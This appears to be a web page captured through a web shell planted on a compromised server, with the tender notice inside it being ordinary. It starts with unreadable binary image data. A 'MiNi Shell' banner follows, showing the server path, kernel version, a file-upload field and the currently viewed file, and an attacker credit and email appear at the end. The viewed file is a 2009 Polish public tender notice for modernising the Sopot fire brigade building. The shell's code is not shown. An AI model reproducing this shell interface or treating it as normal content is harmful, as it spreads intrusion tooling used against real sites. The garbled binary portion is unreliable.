JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090226/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090226/42545-N-2009.html

<p class="kh_header"><b>Sopot: Modernizacja oraz roboty wykończeniowe budynku A z łącznikiem strażnicy Komendy Miejskiej Państwowej Straży Pożarnej w Sopocie</b><br>
<b>Numer ogłoszenia: 42545 - 2009; data zamieszczenia: 26.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Miejska Państwowej Straży Pożarnej w Sopocie , ul. Armii Krajowej 105, 81-824 Sopot, woj. pomorskie, tel. 058 555-81-70, 555 81 71.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.wrotapomorza.pl/pl/bip/panstwowa_straz_pozarna/kmpsp_sopot</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja oraz roboty wykończeniowe budynku A z łącznikiem strażnicy Komendy Miejskiej Państwowej Straży Pożarnej w Sopocie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Modernizacja budynku A w KM PSP w Sopocie obejmuje wykonanie  prac modernizacyjnych I i II piętra wewnątrz budynku oraz klatek schodowych, w szczególności:
1) wykonanie instalacji elektrycznej z montażem osprzętu, 
2) wykonanie okablowania strukturalnego, 
3) wykonanie instalacji sygnalizacyjnych,
4) wykonanie instalacji systemu sygnalizacji pożaru,
5) wykonanie instalacji wod-kan, 
6) wykonanie instalacji centralnego ogrzewania,  
7) wykonanie wentylacji mechanicznej,
8) wykonanie stolarki drzwiowej i robót ślusarskich,
9) wykonanie ocieplenia budynku wraz z połacią dachową,
10) wykończenie nowej klatki schodowej oraz modernizacja klatki istniejącej,
11) wykończenie wnętrz: 
-	tynki ścian, 
-	ścianki działowe GK,
-	sufity podwieszane GK i modułowe,  
-	wylewki,
-	posadzki (gres i PCV),
-	malowanie,
-	wentylacja grawitacyjna,
-	roboty uzupełniające (montaż parapetów, obróbki blacharskie itp.)
Zakres przedmiotu zamówienia nie obejmuje parteru i piwnicy obiektu za wyjątkiem koniecznych przejść instalacyjnych i komunikacji.
szczegółowe kody CPV zamieszczone są w przedmiarach robót.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 150.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca przystępując do przetargu jest obowiązany wnieść wadium w
wysokości: 30 000 zł słownie: trzydzieści tysięcy złotych 00/100 gr.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.  O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1.1  posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień .

1.2  posiadają niezbędną wiedzę i doświadczenie do wykonywania przdmiotu zamówienia - w zakresie tego warunku wymagane jest, aby Wykonawcy wykonali w okresie ostatnich pięciu lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 3 roboty odpowiadające swoim rodzajem i wartością robotom  budowlanym  stanowiącym przedmiot zamówienia polegających na prowadzeniu prac modernizacyjnych, budowlanych wykończeniowych oraz instalacyjnych elektrycznych i wod-kan i c.o. (w tym przynajmniej 1 dotyczącej wykazanej roboty o wartości nie mniejszej niż zaoferowana kwota brutto na wykonanie przedmiotu zamówienia). 
1.3  dysponują osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia - w zakresie tego warunku wymagane jest, aby Wykonawcy:
 - dysponowali osobą - kierownikiem budowy w specjalności budowlano konstrukcyjnej
- dysponowali osobami - kierownikami robót w specjalności instalacji i urządzeń (wod-kan, c.o., wentylacji, elektryczne)
1.4  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia
1.5  nie podlegają wykluczeniu z postępowania o udzielenie zamówienia z powodów, o których mowa w  Art..24 ust.1 i 2 ustawy Prawo zamówień publicznych
2. Ocena  spełnienia w/w warunków dokonana zostanie w oparciu o informacje zawarte w przedłożonych dokumentach i oświadczeniach wyszczególnionych w Rozdziale IV swiz z zachowaniem przepisów art. 26 ust.3 ustawy Pzp. Z treści załączonych dokumentów  i oświadczeń musi wynikać jednoznacznie, iż w/w warunki wykonawca spełnił.
3. Nie spełnienie chociażby jednego z w/w warunków skutkować będzie  wykluczeniem wykonawcy z postępowania. 
4. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy Pzp:
1) potwierdzenie wniesienia wadium;
2) oświadczenie, że Wykonawca spełnia warunki udziału w postępowaniu, określone w art. 22 ust.1 ustawy Pzp - wg Załącznika nr 8 do SIWZ Nr PT-2370/1/09;
3) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestracji lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert 
4) aktualne zaświadczenie  właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków oraz opłat lub zaświadczenie, że uzyskał  przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonywania decyzji organu podatkowego,  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert 
5) zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca  nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał  przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonywania decyzji właściwego organu,  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert 
6) aktualne informacje z Krajowego Rejestru Karnego w zakresie określonym z Art.24 ust.1 pkt 4-8 ustawy wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
7) aktualne informacje z Krajowego Rejestru Karnego w zakresie określonym z Art.24 ust.1 pkt 9 ustawy wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
2. W celu potwierdzenia  posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia: 
1) wykaz robót wykonanych w okresie ostatnich pięciu lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 3 roboty odpowiadające swoim rodzajem i wartością robotom  budowlanym  stanowiącym przedmiot zamówienia polegających na prowadzeniu prac modernizacyjnych, budowlanych wykończeniowych oraz instalacyjnych elektrycznych, wod-kan i c.o. (w tym przynajmniej 1 dotyczącej wykazanej roboty o wartości nie mniejszej niż zaoferowana kwota brutto na wykonanie przedmiotu zamówienia), z podaniem ich wartości oraz daty 
i miejsca wykonania  oraz  dokumenty potwierdzające, że roboty  wymienione w wykazie zostały wykonane należycie- według Załącznika nr 10 do SIWZ Nr         PT-2370/1/09;
2) wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia,   wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonywania zamówienia, a także zakresu wykonywanych przez nich czynności- według Załącznika nr 11  do SIWZ Nr PT-2370/1/09;
3) pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w punkcie powyżej wykonawca wskazał osoby, którymi będzie dysponował;
4) dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - uprawnienia do wykonywania funkcji kierownika budowy, oraz kierowników robót branżowych, wpis do Izby Inżynierów Budownictwa oraz wymagane ubezpieczenie od odpowiedzialności cywilnej;
3. W celu potwierdzenia przez Wykonawcę znajdowania się w sytuacji ekonomicznej i finasowej zapewniającej wykonanie zamówienia:
       1) informacja banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w którym wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy na kwotę co najmniej 20% zoferowanej kwoty brutto na wykonanie przdmiotu zamówienia  wystawioną nie wcześniej niż 3 miesiące przed upływem terminu  składania ofert;
  2) polisę, a w przypadku jej braku  inny dokument potwierdzający, że wykonawca jest             ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 

4. Wykonawcy ubiegający się wspólnie o udzielenie zamówienia publicznego: 
1) ustanawiają pełnomocnika do reprezentowania wykonawców w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego i do oferty dołączają dokument Pełnomocnictwa podpisany przez wszystkich wykonawców wspólnie ubiegających się o zamówienie;
2) ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy;
3) każdy z wykonawców występujący wspólnie musi  przedłożyć wymagane dokumenty i oświadczenia w celu potwierdzenia spełnienia warunków udziału w postępowaniu, przy czym dla sprawdzenia czy warunki postawione przez Zamawiającego dotyczące sytuacji ekonomicznej i finansowej,  wiedzy i doświadczenia oraz potencjału technicznego i kadrowego wykonawców są spełnione - dokumenty te będą oceniane łącznie;
4) w przypadku wyboru oferty złożonej przez wykonawców wspólnie ubiegających się o udzielenie zamówienia, przed zawarciem umowy przedłożą oni zamawiającemu umowę regulującą ich wzajemną współpracę;
5. Jeżeli Wykonawca ma  siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej:
1) zamiast aktualnego odpisu z właściwego rejestru albo aktualne zaświadczenia o wpisie do ewidencji działalności gospodarczej, aktualnego zaświadczenia właściwego naczelnika urzędu skarbowego,  zaświadczenia z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego, aktualnej informacje z Krajowego Rejestru Karnego w zakresie określonym z art.24 ust.1 pkt 9 ustawy -  składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że :
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b) nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonanie decyzji właściwego organu;
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie,
2) zamiast aktualnej informacje z Krajowego Rejestru Karnego w zakresie określonym z art.24 ust.1 pkt 4-8 ustawy,  składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia lub zamieszkania osoby, której dokument dotyczy, w zakresie określonym w art.24 ust.1 pkt. 4-8 ustawy Pzp.
6. Dokumenty , o których mowa w ust.5 pkt.1a  i c oraz pkt.2, powinny być wystawione nie wcześniej niż 6 miesięcy przed terminem składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia / składania ofert. Dokumenty, o których mowa w ust.5 pkt. 1b powinny być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia / ofert.
7. Jeżeli w kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust.5 , zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.. Przepisy ust. 6 stosuję się odpowiednio..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.wrotapomorza.pl/pl/bip/panstwowa_straz_pozarna/kmpsp_sopot.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komenda Miejska PSP w Sopocie
ul. Armii Krajowej 105
81-824 Sopot
Opłata za pobranie papierowej wersji Specyfikacji Istotnych Warunków Zamówienia wynosi 100 PLN.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.03.2009 godzina 10:00, miejsce: W siedzibie Zamawiającego w Komendzie Miejskiej Państwowej Straży Pożarnej w Sopocie ul. Armii Krajowej 105, 81-824 Sopot.,  pok. nr 1 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com